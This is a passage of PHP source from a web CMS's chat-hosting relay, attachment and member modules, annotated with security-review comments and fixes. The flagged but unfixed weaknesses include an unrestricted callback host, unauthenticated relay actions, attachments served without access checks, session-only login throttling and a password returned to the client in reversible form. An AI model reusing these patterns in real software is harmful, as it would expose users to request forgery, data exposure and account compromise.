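                // followed and field values are never interpreted as file uploads.
                // NOTE(review): the destination host is not restricted; add an allow-list or
                // block internal address ranges if this host can reach private services.
                $postToCallback = function ($url, $fields) {
                    $scheme = strtolower((string) parse_url((string) $url, PHP_URL_SCHEME));
                    if ($scheme != 'http' && $scheme != 'https') {
                        return false;
                    }

                    $curlsession = curl_init();
                    curl_setopt($curlsession, CURLOPT_URL, $url);
                    curl_setopt($curlsession, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);
                    curl_setopt($curlsession, CURLOPT_FOLLOWLOCATION, false);
                    if (defined('CURLOPT_SAFE_UPLOAD') == true) {
                        curl_setopt($curlsession, CURLOPT_SAFE_UPLOAD, true);
                    }
                    curl_setopt($curlsession, CURLOPT_POST, 1);
                    curl_setopt($curlsession, CURLOPT_POSTFIELDS, $fields);
                    curl_setopt($curlsession, CURLOPT_TIMEOUT, 10);
                    curl_setopt($curlsession, CURLOPT_RETURNTRANSFER, 1);
                    $buffer = curl_exec($curlsession);
                    curl_close($curlsession);

                    return $buffer;
                };

                $d = json_decode(Request('d'));

                // NOTE(review): nothing here proves the caller is a minitalk server; anyone who
                // knows a channel code can trigger these relays.
                if ($d->action == 'save_channel') {
                    $sIdx = preg_replace('/H0+/', '', $d->code);
                    $check = $this->db()->select($this->table->hosting)->where('idx', $sIdx)->getOne();

                    if ($check != null) {
                        $buffer = $postToCallback($check->callback, array('action' => 'save_channel', 'mcode' => $check->client_id, 'list' => json_encode($d->list)));

                        if ($buffer) {
                            // Re-encode so only JSON is relayed back to the caller.
                            exit(json_encode(json_decode($buffer, true)));
                        } else {
                            exit(json_encode(array('success' => false)));
                        }
                    } else {
                        exit(json_encode(array('success' => false)));
                    }
                }

                if ($d->action == 'banip') {
                    $sIdx = preg_replace('/H0+/', '', $d->code);
                    $check = $this->db()->select($this->table->hosting)->where('idx', $sIdx)->getOne();
                    $memo = 'from ' . $d->from;

                    if ($check != null) {
                        $buffer = $postToCallback($check->callback, array('action' => 'banip', 'mcode' => $check->client_id, 'ip' => $d->ip, 'memo' => $memo));

                        if ($buffer) {
                            exit(json_encode(json_decode($buffer, true)));
                        } else {
                            exit(json_encode(array('success' => false)));
                        }
                    } else {
                        exit(json_encode(array('success' => false)));
                    }
                }
            }

            if ($protocol == 'register_server') {
                $email = $data->user_id;
                $password = $data->password;
                $client_id = $data->mcode;
                $server_id = strtoupper($data->scode);
                // Stored as the callback URL that the `callback` protocol later POSTs to.
                // NOTE(review): it is saved as received; the scheme is enforced when it is used.
                $dbpath = $data->dbpath;

                $midx = $this->IM->getModule('member')->isValidate($email, $password);
                if ($midx !== false) {
                    $service = $this->db()->select($this->table->hosting)->where('midx', $midx)->where('client_id', $client_id)->getOne();
                    if ($service == null) {
                        $results->success = false;
                        $results->message = '등록되어 있는 접속키가 아닙니다.<br />접속키를 한번더 확인하여 주십시오.';
                    } elseif ($service->server_id && $service->server_id != $server_id) {
                        $results->success = false;
                        $results->message = '이미 다른 미니톡과 연동되어 있는 접속키입니다.<br />다른 미니톡클라이언트와 이미 연동이 되어있거나, 연동 후 미니톡클라이언트의 접속주소가 변경된 경우입니다.<br />미니톡 홈페이지에서 해당 접속키 연동정보를 초기화한 뒤 다시 시도하여 주십시오.';
                    } else {
                        $this->db()->update($this->table->hosting, array('server_id' => $server_id, 'callback' => $dbpath, 'check_date' => time()))->where('idx', $service->idx)->execute();
                        $results->success = true;
                        $results->mcode = $client_id;
                    }
                } else {
                    $results->success = false;
                    $results->message = '로그인에 실패하였습니다.<br />미니톡 홈페이지의 이메일주소와 패스워드를 정확히 입력하여 주십시오.';
                }
            }

            if ($protocol == 'server_info') {
                $client_id = strtoupper($data->mcode);
                $server_id = strtoupper($data->scode);

                $service = $this->db()->select($this->table->hosting)->where('client_id', $client_id)->where('server_id', $server_id)->getOne();
                if ($service == null) {
                    $results->success = false;
                } else {
                    $results->success = true;
                    $results->user = $service->user;
                    $results->channel = $service->channel;
                    $results->maxuser = $service->maxuser;
                    $results->expire_time = $service->expire_date < time() ? '' : date('Y-m-d H:i:s', $service->expire_date) . '(KST)';

                    if ($service->server == '0') {
                        $results->check_time = date('Y-m-d H:i:s') . '(KST)';
                    } else {
                        $server = $this->db()->select($this->table->server)->where('idx', $service->server)->getOne();
                        $results->check_time = date('Y-m-d H:i:s', $server->check_date) . '(KST)';
                    }
                    $results->status = $this->db()->select($this->table->server)->where('status', 'ONLINE')->where('is_select', 'TRUE')->count() > 0 ? 'ONLINE' : 'OFFLINE';
                    $results->auth = $service->server_id == $server_id;
                }
            }

            if ($protocol == 'check_server') {
                $client_id = strtoupper($data->mcode);
                $server_id = strtoupper($data->scode);
                $key = $data->key;
                $ip = $data->ip;

                $service = $this->db()->select($this->table->hosting)->where('client_id', $client_id)->where('server_id', $server_id)->getOne();
                if ($service == null) {
                    $results->success = false;
                } else {
                    $server = null;

                    if ($service->server == 0) {
                        // No server assigned yet: pick the least-loaded selectable server that answers.
                        $servers = $this->db()->select($this->table->server)->where('status', 'ONLINE')->where('is_select', 'TRUE')->where('version', $serverVersion)->orderBy('user', 'asc')->get();
                        for ($i = 0, $loop = count($servers); $i < $loop; $i++) {
                            if ($this->isServerOnline($servers[$i]->idx) == true) {
                                $server = $servers[$i];
                                break;
                            }
                        }

                        if ($server !== null) {
                            $this->db()->update($this->table->hosting, array('server' => $server->idx))->where('idx', $service->idx)->execute();
                        }
                    } else {
                        if ($this->isServerOnline($service->server) == true) {
                            $server = $this->db()->select($this->table->server)->where('idx', $service->server)->getOne();
                        } else {
                            // Assigned server is down: reset the counters and fail over to another one.
                            $this->db()->update($this->table->hosting, array('server' => 0, 'user' => 0, 'channel' => 0))->where('idx', $service->idx)->execute();

                            $servers = $this->db()->select($this->table->server)->where('status', 'ONLINE')->where('version', $serverVersion)->orderBy('user', 'asc')->get();
                            for ($i = 0, $loop = count($servers); $i < $loop; $i++) {
                                if ($this->isServerOnline($servers[$i]->idx) == true) {
                                    $server = $servers[$i];
                                    break;
                                }
                            }

                            if ($server !== null) {
                                // Persist the failover target on this hosting row.
                                $this->db()->update($this->table->hosting, array('server' => $server->idx))->where('idx', $service->idx)->execute();
                            }
                        }
                    }

                    if ($server !== null) {
                        $server->channelCode = 'H' . sprintf('%09d', $service->idx);
                        $server->serverCode = urlencode(Encoder(json_encode(array('ip' => $ip, 'expire_time' => $service->expire_date, 'maxuser' => $service->maxuser, 'key' => $key)), 'com.arzz.program.kr.minitalk.www'));

                        $results->success = true;
                        // Strip internal load/state columns before the row is returned to the client.
                        unset($server->user, $server->channel, $server->status, $server->check_date);
                        $results->server = $server;
                    } else {
                        $results->success = false;
                    }
                }
            }
        }
    }

    return $results;
}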
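/**
 * Handles the attachment module's request actions and returns a result object.
 *
 * Actions handled here:
 *  - 'view'      : streams an image/video attachment (or its cached ".view" rendition) and exits.
 *  - 'thumbnail' : streams the cached ".thumb" rendition, creating it for images on demand, and exits.
 *  - 'download'  : delegates to fileDownload().
 *  - 'load'      : resolves an encoded list of attachment ids into file-info objects.
 *  - 'upload'    : two-phase chunked upload (metadata registration, then Content-Range chunks).
 *
 * NOTE(review): 'view' and 'thumbnail' look the record up by the raw request 'idx' and perform
 * no access check in this method; confirm attachments are meant to be readable by anyone who
 * can guess an id, or add an authorization check.
 *
 * @param string $action Action name taken from the request.
 * @return stdClass Result object (success flag plus action-specific fields).
 */
function doProcess($action)
{
    $results = new stdClass();
    $values = new stdClass();

    if ($action == 'view') {
        $idx = Request('idx');
        $file = $this->db()->select($this->table->attachment)->where('idx', $idx)->getOne();
        if ($file == null) {
            header("HTTP/1.1 404 Not Found");
            exit;
        }

        $filePath = $this->IM->getAttachmentPath() . '/' . $file->path;
        $viewPath = $filePath . '.view';

        if (in_array($file->type, array('image', 'video'), true) == false || file_exists($filePath) == false) {
            header("HTTP/1.1 404 Not Found");
            exit;
        }

        // The stored MIME type is the value the client supplied in the upload metadata (see the
        // 'upload' action). Stop browsers from second-guessing it.
        // NOTE(review): unless fileUpload() re-derives the MIME type from the file contents,
        // consider an allow-list of image/video types before echoing it back.
        header('X-Content-Type-Options: nosniff');
        header('Content-Type: ' . $file->mime);

        if ($file->width > 1000) {
            if (file_exists($viewPath) == true) {
                // A cached rendition of a video is a JPEG still, not the video itself.
                if ($file->type == 'image') {
                    header('Content-Type: ' . $file->mime);
                } else {
                    header('Content-Type: image/jpeg');
                }
                header('Content-Length: ' . filesize($viewPath));
                readfile($viewPath);
                exit;
            } elseif ($file->type == 'image') {
                // No cached rendition yet: scale the image down to 1000px wide and cache it.
                if ($this->createThumbnail($filePath, $viewPath, 1000, 0, false) == false) {
                    header("HTTP/1.1 404 Not Found");
                    exit;
                }
                header('Content-Type: ' . $file->mime);
                header('Content-Length: ' . filesize($viewPath));
                readfile($viewPath);
                exit;
            } else {
                header("HTTP/1.1 404 Not Found");
                exit;
            }
        } else {
            // Fix: the original sent the size as a second Content-Type header, which replaced
            // the MIME type set above. The size belongs in Content-Length.
            header('Content-Length: ' . filesize($filePath));
            readfile($filePath);
        }
        exit;
    }

    if ($action == 'thumbnail') {
        $idx = Request('idx');
        $file = $this->db()->select($this->table->attachment)->where('idx', $idx)->getOne();
        if ($file == null) {
            header("HTTP/1.1 404 Not Found");
            exit;
        }

        $filePath = $this->IM->getAttachmentPath() . '/' . $file->path;
        $thumbPath = $filePath . '.thumb';

        header('X-Content-Type-Options: nosniff');

        if (file_exists($thumbPath) == true) {
            if ($file->type == 'image') {
                header('Content-Type: ' . $file->mime);
            } else {
                header('Content-Type: image/jpeg');
            }
            header('Content-Length: ' . filesize($thumbPath));
            readfile($thumbPath);
            exit;
        } elseif ($file->type == 'image' && file_exists($filePath) == true) {
            // Constrain the shorter side to 500px; 0 leaves the other dimension to createThumbnail().
            $created = $this->createThumbnail(
                $filePath,
                $thumbPath,
                $file->width <= $file->height ? 500 : 0,
                $file->width > $file->height ? 500 : 0,
                false
            );
            if ($created == false) {
                header("HTTP/1.1 404 Not Found");
                exit;
            }
            header('Content-Type: ' . $file->mime);
            header('Content-Length: ' . filesize($thumbPath));
            readfile($thumbPath);
            exit;
        } else {
            header("HTTP/1.1 404 Not Found");
            exit;
        }
    }

    if ($action == 'download') {
        $idx = Request('idx');
        $this->fileDownload($idx);
    }

    if ($action == 'load') {
        $decodedKey = Decoder(Request('key'));
        $idx = $decodedKey != false ? json_decode($decodedKey) : array();
        // json_decode() may yield null, a scalar or an object; only a list of ids is usable here.
        if (is_array($idx) == false) {
            $idx = array();
        }

        $values->files = array();
        foreach ($idx as $fileIdx) {
            $fileInfo = $this->getFileInfo($fileIdx);
            if ($fileInfo != null) {
                $values->files[] = $fileInfo;
            }
        }

        $results->success = true;
        $results->files = $values->files;
    }

    if ($action == 'upload') {
        $idx = Request('idx');

        if ($idx == null) {
            // Phase 1: register the upload from client-supplied metadata and hand back an
            // encoded id that the chunk requests must present.
            $values->status = 'METADATA';
            $meta = json_decode(Request('meta'));

            // Require an object carrying at least name/type/size; the original dereferenced any
            // non-null JSON value.
            // NOTE(review): name, type and size are untrusted; no maximum size or type
            // allow-list is enforced in this method.
            if (is_object($meta) == true && isset($meta->name, $meta->type, $meta->size) == true) {
                $path = $this->getTempPath() . '/' . md5(Request('meta')) . '.' . base_convert(microtime(true) * 10000, 10, 32) . '.temp';
                $idx = $this->db()->insert($this->table->attachment, array(
                    'module' => isset($meta->module) == true ? $meta->module : null,
                    'target' => isset($meta->target) == true ? $meta->target : null,
                    'path' => $path,
                    'name' => $meta->name,
                    'type' => $this->getFileType($meta->type),
                    'mime' => $meta->type,
                    'size' => $meta->size,
                    'wysiwyg' => empty($meta->wysiwyg) == false ? 'TRUE' : 'FALSE',
                    'reg_date' => time(),
                ))->execute();

                $values->fileInfo = $this->getFileInfo($idx);
                $results->success = true;
                $results->idx = $idx;
                $results->code = Encoder($idx);
            } else {
                $results->success = false;
                $results->message = 'METADATA ERROR';
            }
        } else {
            // Phase 2: append one chunk, identified by the encoded id and the Content-Range header.
            $idx = Decoder(Request('idx'));
            if ($idx) {
                $fileInfo = $this->db()->select($this->table->attachment)->where('idx', $idx)->getOne();
                if ($fileInfo != null) {
                    if (isset($_SERVER['HTTP_CONTENT_RANGE']) == true && preg_match('/bytes ([0-9]+)\\-([0-9]+)\\/([0-9]+)/', $_SERVER['HTTP_CONTENT_RANGE'], $fileRange) == true) {
                        $targetPath = $this->IM->getAttachmentPath() . '/' . $fileInfo->path;
                        $declaredSize = intval($fileInfo->size);

                        $values->chunkBytes = file_get_contents("php://input");
                        $values->chunkRangeStart = intval($fileRange[1]);
                        $values->chunkRangeEnd = intval($fileRange[2]);
                        $values->chunkTotalLength = intval($fileRange[3]);

                        // Bytes already on disk: a chunk starting at 0 truncates the file, any
                        // other chunk is appended to whatever is there.
                        clearstatcache(true, $targetPath);
                        $writtenBytes = ($values->chunkRangeStart === 0 || file_exists($targetPath) == false) ? 0 : filesize($targetPath);

                        if ($values->chunkBytes === false || $writtenBytes + strlen($values->chunkBytes) > $declaredSize) {
                            // Never let the file grow past the size registered in phase 1.
                            $results->success = false;
                            $results->message = 'RANGE ERROR';
                        } else {
                            $fp = fopen($targetPath, $values->chunkRangeStart === 0 ? 'w' : 'a');
                            if ($fp === false) {
                                $results->success = false;
                                $results->message = 'FILE ERROR';
                            } else {
                                // In append mode writes always go to the end of the file, so the
                                // original fseek() to chunkRangeStart had no effect and is dropped;
                                // chunks must arrive in order.
                                fwrite($fp, $values->chunkBytes);
                                fclose($fp);

                                if ($values->chunkRangeEnd + 1 === $values->chunkTotalLength) {
                                    clearstatcache(true, $targetPath);
                                    // Read the size before unlink(); the original called filesize()
                                    // on the already-deleted file when building the message.
                                    $finalSize = filesize($targetPath);

                                    if ($declaredSize != $finalSize) {
                                        unlink($targetPath);
                                        $this->db()->delete($this->table->attachment)->where('idx', $fileInfo->idx)->execute();
                                        $results->success = false;
                                        $results->message = 'SIZE NOT MATCHED (' . strlen($values->chunkBytes) . '/' . $fileInfo->size . '/' . $finalSize . ')';
                                    } else {
                                        $values->status = 'COMPLETE';
                                        $values->fileInfo = $this->fileUpload($fileInfo->idx);
                                        $results->success = true;
                                        $results->file = $values->fileInfo;
                                    }
                                } else {
                                    $values->status = 'UPLOADING';
                                    $values->fileInfo = $fileInfo;
                                    $results->success = true;
                                }
                            }
                        }
                    } else {
                        $results->success = false;
                        $results->message = 'HEADER ERROR';
                    }
                } else {
                    $results->success = false;
                    $results->message = 'UNREGISTED FILE';
                }
            } else {
                $results->success = false;
                $results->message = 'NOT FOUND IDX';
            }
        }
    }

    $this->IM->fireEvent('afterDoProcess', 'attachment', $action, $values, $results);

    return $results;
}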
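/**
 * Handles the member module's request actions and returns a result object.
 *
 * Actions handled here: 'check', 'forceLogin', 'login', 'logout', 'cert', 'signup',
 * 'verifyEmail', 'sendVerifyEmail', 'photoEdit', 'photoUpload', 'modifyEmail', 'modify',
 * 'password', and the OAuth entry points 'facebook', 'google', 'youtube' and 'github'.
 * After the action runs, the 'afterDoProcess' event is fired with $values and $results.
 *
 * Changes against the previous version:
 *  - calls to the misspelled getLangauge() are corrected to getLanguage();
 *  - 'sendVerifyEmail' no longer dereferences a missing e-mail record;
 *  - verification codes are compared as strings with hash_equals() instead of loose ==;
 *  - 'modifyEmail' (confirm) and 'modify' (verify) require a logged-in member;
 *  - 'photoUpload' only stores data that decodes to an image and checks the resize result;
 *  - a missing Referer header no longer stores null as the OAuth return URL.
 *
 * @param string $action Action name taken from the request.
 * @return stdClass Result object (success flag plus message/errors/redirect fields).
 */
function doProcess($action)
{
    $results = new stdClass();
    $values = new stdClass();

    if ($action == 'check') {
        // Live validation of a single form field.
        $name = Request('name');
        $value = Request('value');

        if ($name == 'email') {
            $siteType = $this->IM->getSites($this->IM->domain)->member;
            if (CheckEmail($value) == true) {
                // Taken if another member of this domain ('*' for merged sites) or any
                // administrator already uses the address.
                if (
                    $this->db()->select($this->table->member)->where('email', $value)->where('idx', $this->getLogged(), '!=')->where('domain', $siteType == 'MERGE' ? '*' : $this->IM->domain)->has() == true
                    || $this->db()->select($this->table->member)->where('email', $value)->where('idx', $this->getLogged(), '!=')->where('type', 'ADMINISTRATOR')->has() == true
                ) {
                    $results->success = false;
                    $results->message = $this->getLanguage('signup/help/email/duplicated');
                } else {
                    $results->success = true;
                }
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('signup/help/email/error');
            }
        }

        if ($name == 'name') {
            if (strlen($value) > 0) {
                $results->success = true;
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('signup/help/name/error');
            }
        }

        if ($name == 'nickname') {
            $siteType = $this->IM->getSites($this->IM->domain)->member;
            if (CheckNickname($value) == true) {
                if (
                    $this->db()->select($this->table->member)->where('nickname', $value)->where('idx', $this->getLogged(), '!=')->where('domain', $siteType == 'MERGE' ? '*' : $this->IM->domain)->has() == true
                    || $this->db()->select($this->table->member)->where('nickname', $value)->where('idx', $this->getLogged(), '!=')->where('type', 'ADMINISTRATOR')->has() == true
                ) {
                    $results->success = false;
                    $results->message = $this->getLanguage('signup/help/nickname/duplicated');
                } else {
                    $results->success = true;
                }
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('signup/help/nickname/error');
            }
        }

        if ($name == 'old_password') {
            if ($this->isLogged() == false) {
                $results->success = false;
                $results->message = $this->getLanguage('error/notLogged');
            } else {
                $mHash = new Hash();
                if ($mHash->password_validate($value, $this->getMember()->password) == true) {
                    $results->success = true;
                    $results->message = $this->getLanguage('password/help/old_password/success');
                } else {
                    $results->success = false;
                    $results->message = $this->getLanguage('password/help/old_password/error');
                }
            }
        }
    }

    if ($action == 'forceLogin') {
        // Logs in the member named inside an encoded token, bound to the caller's IP address.
        // NOTE(review): the token carries no expiry that this method checks; its security
        // rests entirely on Encoder()/Decoder() — confirm they authenticate the payload.
        $code = Decoder(Request('code'));
        if ($code === false) {
            $results->success = false;
            $results->message = $this->getLanguage('error/invalidCode');
        } else {
            $data = json_decode($code);
            if (is_object($data) == true && isset($data->ip, $data->idx) == true && $data->ip === $_SERVER['REMOTE_ADDR']) {
                $this->login($data->idx);
                $results->success = true;
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('error/invalidCode');
            }
        }
    }

    if ($action == 'login') {
        $mHash = new Hash();
        $email = Request('email');
        $password = Request('password');
        $results->errors = array();

        // Failure counter: after the 5th failure, logins are refused for 5 hours.
        // NOTE(review): the counter is kept in the session only, so it does not throttle a
        // client that discards its session cookie; consider a server-side counter per
        // account and/or per address. It is also not reset on a successful login.
        $loginFail = Request('loginFail', 'session') != null && is_array(Request('loginFail', 'session')) == true
            ? Request('loginFail', 'session')
            : array('count' => 0, 'time' => 0);

        if ($loginFail['time'] > time()) {
            $results->success = false;
            $results->message = $this->getLanguage('login/error/login');
        } else {
            $siteType = $this->IM->getSites($this->IM->domain)->member;
            if ($siteType == 'MERGE') {
                $check = $this->db()->select($this->table->member)->where('email', $email)->where('domain', '*')->getOne();
            } else {
                $check = $this->db()->select($this->table->member)->where('email', $email)->where('domain', $this->IM->domain)->getOne();
            }

            // No member in this domain: fall back to administrators.
            if ($check == null) {
                $check = $this->db()->select($this->table->member)->where('email', $email)->where('type', 'ADMINISTRATOR')->getOne();
            }

            if ($check == null) {
                $results->success = false;
                $results->errors['email'] = $this->getLanguage('login/error/email');
                $loginFail['count']++;
                if ($loginFail['count'] == 5) {
                    $loginFail['count'] = 0;
                    $loginFail['time'] = time() + 60 * 60 * 5;
                }
                // NOTE(review): the submitted plaintext password is handed to every
                // 'afterDoProcess' listener via $values; confirm listeners never log or store it.
                $values->email = $email;
                $values->password = $password;
            } elseif ($mHash->password_validate($password, $check->password) == false) {
                $results->success = false;
                $results->errors['password'] = $this->getLanguage('login/error/password');
                $loginFail['count']++;
                if ($loginFail['count'] == 5) {
                    $loginFail['count'] = 0;
                    $loginFail['time'] = time() + 60 * 60 * 5;
                }
                $values->email = $email;
                $values->password = $password;
            } else {
                if ($check->status == 'ACTIVE') {
                    $this->db()->update($this->table->member, array('last_login' => time()))->where('idx', $check->idx)->execute();
                    $this->login($check->idx);
                    $results->success = true;
                } elseif ($check->status == 'VERIFYING') {
                    // Account exists but the e-mail is unverified: send the user to the verify step.
                    $_SESSION['MEMBER_REGISTER_IDX'] = Encoder($check->idx);
                    $page = $this->getMemberPage('signup');
                    $results->success = false;
                    $results->redirect = $this->IM->getUrl($page->menu, $page->page, 'verify');
                } else {
                    $results->success = false;
                    $results->message = $this->getLanguage('error/' . $check->status);
                }
            }
        }

        $_SESSION['loginFail'] = $loginFail;
    }

    if ($action == 'logout') {
        unset($_SESSION['MEMBER_LOGGED']);
        $results->success = true;
    }

    if ($action == 'cert') {
        $results->success = true;
    }

    if ($action == 'signup') {
        $siteType = $this->IM->getSites($this->IM->domain)->member;
        $errors = array();

        // Each field is either the validated request value or, on failure, the error text
        // (which is also recorded in $errors).
        $email = CheckEmail(Request('email')) == true ? Request('email') : ($errors['email'] = $this->getLanguage('signup/help/email/error'));
        // NOTE(review): the only password rule enforced here is a minimum length of 4.
        $password = strlen(Request('password')) >= 4 ? Request('password') : ($errors['password'] = $this->getLanguage('signup/help/password/error'));
        // Strict comparison: with != two different numeric-looking strings can compare equal.
        if (strlen(Request('password')) < 4 || Request('password') !== Request('password_confirm')) {
            $errors['password_confirm'] = $this->getLanguage('signup/help/password_confirm/error');
        }
        $name = CheckNickname(Request('name')) == true ? Request('name') : ($errors['name'] = $this->getLanguage('signup/help/name/error'));
        $nickname = CheckNickname(Request('nickname')) == true ? Request('nickname') : ($errors['nickname'] = $this->getLanguage('signup/help/nickname/error'));

        if (
            $this->db()->select($this->table->member)->where('email', $email)->where('domain', $siteType == 'MERGE' ? '*' : $this->IM->domain)->has() == true
            || $this->db()->select($this->table->member)->where('email', $email)->where('type', 'ADMINISTRATOR')->has() == true
        ) {
            $errors['email'] = $this->getLanguage('signup/help/email/duplicated');
        }

        if (
            $this->db()->select($this->table->member)->where('nickname', $nickname)->where('domain', $siteType == 'MERGE' ? '*' : $this->IM->domain)->has() == true
            || $this->db()->select($this->table->member)->where('nickname', $nickname)->where('type', 'ADMINISTRATOR')->has() == true
        ) {
            $errors['nickname'] = $this->getLanguage('signup/help/nickname/duplicated');
        }

        if (empty($errors) == true) {
            $mHash = new Hash();

            $insert = array();
            $insert['email'] = $email;
            $insert['domain'] = $siteType == 'MERGE' ? '*' : $this->IM->domain;
            $insert['password'] = $mHash->password_hash($password);
            $insert['name'] = $name;
            $insert['nickname'] = $nickname;
            $insert['status'] = 'VERIFYING';
            $insert['reg_date'] = time();

            $idx = $this->db()->insert($this->table->member, $insert)->execute();
            if ($idx !== false) {
                $results->success = true;
                $_SESSION['MEMBER_REGISTER_IDX'] = Encoder($idx);
                $this->sendVerifyEmail($idx);
                unset($_SESSION['registerGIDX']);
            } else {
                $results->success = false;
            }
        } else {
            $results->success = false;
            $results->errors = $errors;
        }
    }

    if ($action == 'verifyEmail') {
        // NOTE(review): registerIDX comes from the request and attempts are not counted in
        // this method; confirm the code is long enough and/or rate-limited elsewhere.
        $registerIDX = Request('registerIDX');
        if ($registerIDX == null) {
            $results->success = false;
        } else {
            $email = Request('email');
            $email_verify_code = Request('email_verify_code');
            $check = $this->db()->select($this->table->email)->where('midx', $registerIDX)->where('email', $email)->getOne();

            if ($check == null) {
                $results->success = false;
                $results->errors = array('email' => $this->getLanguage('verifyEmail/help/email/notFound'));
            } elseif (is_string($email_verify_code) == true && $email_verify_code !== '' && hash_equals((string) $check->code, $email_verify_code) == true) {
                // Exact string match; a loose == would also accept numerically-equal strings
                // and an empty submission against an empty stored code.
                $this->db()->update($this->table->email, array('status' => 'VERIFIED'))->where('midx', $registerIDX)->where('email', $email)->execute();
                $this->db()->update($this->table->member, array('status' => 'ACTIVE'))->where('idx', $registerIDX)->execute();
                $results->success = true;
            } else {
                $results->success = false;
                $results->errors = array('email_verify_code' => $this->getLanguage('verifyEmail/help/email_verify_code/error'));
            }
        }
    }

    if ($action == 'sendVerifyEmail') {
        $registerIDX = Request('registerIDX');
        $email = Request('email');

        if ($this->isLogged() == true) {
            // Logged-in member asking to verify a (new) address.
            if (CheckEmail($email) == false) {
                $results->success = false;
                $results->errors = array('email' => $this->getLanguage('modifyEmail/help/email/error'));
            } elseif ($this->db()->select($this->table->member)->where('email', $email)->count() == 1) {
                $results->success = false;
                $results->errors = array('email' => $this->getLanguage('modifyEmail/help/email/duplicated'));
            } else {
                $check = $this->db()->select($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->getOne();
                // Re-send unless a mail is still pending and younger than 300 seconds.
                if ($check == null || $check->status != 'SENDING' || $check->status == 'SENDING' && $check->reg_date + 300 < time()) {
                    $this->db()->delete($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->execute();
                    $this->sendVerifyEmail($this->getLogged(), $email);
                    $results->success = true;
                    $results->message = $this->getLanguage('verifyEmail/sending');
                } else {
                    $results->success = false;
                    $results->message = $this->getLanguage('verifyEmail/error/sending');
                }
            }
        } elseif ($registerIDX != null) {
            // Not logged in: only accounts still in the VERIFYING state may request a mail.
            $member = $this->db()->select($this->table->member)->where('idx', $registerIDX)->getOne();
            if ($member == null || $member->status != 'VERIFYING') {
                $results->success = false;
                $results->message = $this->getLanguage('verifyEmail/error/target');
            } else {
                if (CheckEmail($email) == false) {
                    $results->success = false;
                    $results->message = $this->getLanguage('verifyEmail/error/email');
                } else {
                    $check = $this->db()->select($this->table->email)->where('midx', $registerIDX)->where('email', $email)->getOne();
                    // Fix: test for a missing record before reading its status; the original
                    // read $check->status first and only then handled $check == null.
                    if ($check != null && $check->status == 'VERIFIED') {
                        $signupPage = $this->getMemberPage('signup');
                        $results->success = true;
                        $this->db()->update($this->table->member, array('status' => 'ACTIVE'))->where('idx', $registerIDX)->execute();
                        $results->redirect = $this->IM->getUrl($signupPage->menu, $signupPage->page, 'complete');
                    } elseif ($check == null || $check->status == 'CANCELED' || $check->status == 'SENDING' && $check->reg_date + 300 < time()) {
                        $this->db()->delete($this->table->email)->where('midx', $registerIDX)->where('email', $email)->execute();
                        $this->sendVerifyEmail($registerIDX, $email);
                        $results->success = true;
                        $results->message = $this->getLanguage('verifyEmail/sending');
                    } else {
                        $results->success = false;
                        $results->message = $this->getLanguage('verifyEmail/error/sending');
                    }
                }
            }
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        }
    }

    if ($action == 'photoEdit') {
        $templet = Request('templet');
        if ($this->isLogged() == true) {
            $results->success = true;
            $results->modalHtml = $this->getPhotoEdit($templet);
            $results->photo = $this->getMember()->photo;
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        }
    }

    if ($action == 'photoUpload') {
        $photo = Request('photo');
        if ($this->isLogged() == false) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        } else {
            $bytes = false;
            if (preg_match('/^data:image\\/(.*?);base64,(.*?)$/', $photo, $match) == true) {
                $bytes = base64_decode($match[2], true);
            }

            // The "data:image/..." prefix is only a claim by the client; accept the payload
            // only if it really parses as an image.
            if ($bytes !== false && getimagesizefromstring($bytes) !== false) {
                $photoPath = $this->IM->getAttachmentPath() . '/member/' . $this->getLogged() . '.jpg';
                file_put_contents($photoPath, $bytes);

                // Re-encode in place as a 250x250 JPEG. If that fails, do not leave the raw
                // upload behind under the public photo path.
                if ($this->IM->getModule('attachment')->createThumbnail($photoPath, $photoPath, 250, 250, false, 'jpg') == false) {
                    if (file_exists($photoPath) == true) {
                        unlink($photoPath);
                    }
                    $results->success = false;
                    $results->message = $this->getLanguage('photoEdit/error');
                } else {
                    $results->success = true;
                    $results->message = $this->getLanguage('photoEdit/success');
                }
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('photoEdit/error');
            }
        }
    }

    if ($action == 'modifyEmail') {
        $confirm = Request('confirm');
        if ($confirm == 'TRUE') {
            if ($this->isLogged() == false) {
                // Fix: the confirm step changes the member's address, so it needs a session.
                $results->success = false;
                $results->message = $this->getLanguage('error/notLogged');
            } else {
                $email = Request('email');
                $code = Request('code');
                $check = $this->db()->select($this->table->email)->where('midx', $this->getLogged())->where('email', $email)->getOne();

                if ($check == null || is_string($code) == false || $code === '' || hash_equals((string) $check->code, $code) == false) {
                    $results->success = false;
                    $results->errors = array('code' => $this->getLanguage('modifyEmail/help/code/error'));
                } else {
                    $this->db()->update($this->table->email, array('status' => 'VERIFIED'))->where('midx', $this->getLogged())->where('email', $email)->execute();
                    $this->db()->update($this->table->member, array('email' => $email))->where('idx', $this->getLogged())->execute();
                    $results->success = true;
                    $results->message = $this->getLanguage('modifyEmail/success');
                }
            }
        } else {
            $templet = Request('templet');
            if ($this->isLogged() == true) {
                $results->success = true;
                $results->modalHtml = $this->getModifyEmail($templet);
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('error/notLogged');
            }
        }
    }

    if ($action == 'modify') {
        $step = Request('step');

        if ($step == 'verify') {
            if ($this->isLogged() == false) {
                // Fix: without a logged-in member there is no stored hash to verify against.
                $results->success = false;
                $results->message = $this->getLanguage('error/notLogged');
            } else {
                $member = $this->getMember();
                $password = Request('password');
                $mHash = new Hash();
                if ($mHash->password_validate($password, $member->password) == true) {
                    $results->success = true;
                    // NOTE(review): this returns the member's password to the client in
                    // Encoder() form, which looks reversible (Decoder() exists). The 'modify'
                    // step below does not read it back; consider a one-time server-side flag
                    // instead.
                    $results->password = Encoder($password);
                } else {
                    $results->success = false;
                    $results->errors = array('password' => $this->getLanguage('verify/help/password/error'));
                }
            }
        }

        if ($step == 'modify') {
            $errors = array();
            // NOTE(review): unlike 'signup', the nickname is neither passed through
            // CheckNickname() nor checked for duplicates here; and this step does not itself
            // confirm that the 'verify' step was passed.
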